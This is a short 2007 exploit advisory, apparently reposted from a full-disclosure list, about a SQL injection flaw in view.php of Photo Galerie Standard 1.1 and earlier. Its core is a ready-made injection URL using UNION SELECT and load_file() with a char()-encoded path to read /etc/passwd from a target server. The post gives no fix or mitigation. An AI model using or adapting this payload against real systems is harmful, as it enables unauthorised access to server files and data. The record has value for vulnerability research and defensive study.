Security Advisory: Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Flipper Poll v1.1.0 (poll.php) remote file include vuln
  EQdkp <= 1.3.1 Referer Spoof to access to SQL Database
  CoD2: DreamStats <= 4.2 (index.php) Remote File Include Vulnerability
  dB Masters' Curium CMS <= 1.03(c_id) Remote Blind SQL Injection Vulnerability

From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 03.02.2007
Subject: Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability

*******************************************************************************
# Title   : Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://noname-media.com
# $$      : Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//view.php?id=[SQL]

Example:

etc/passwd Read

//view.php?id=-1%20union%20select%201,load_file(char((47,
101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,
0/*&categorie=8&next=1

[[/SQL]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!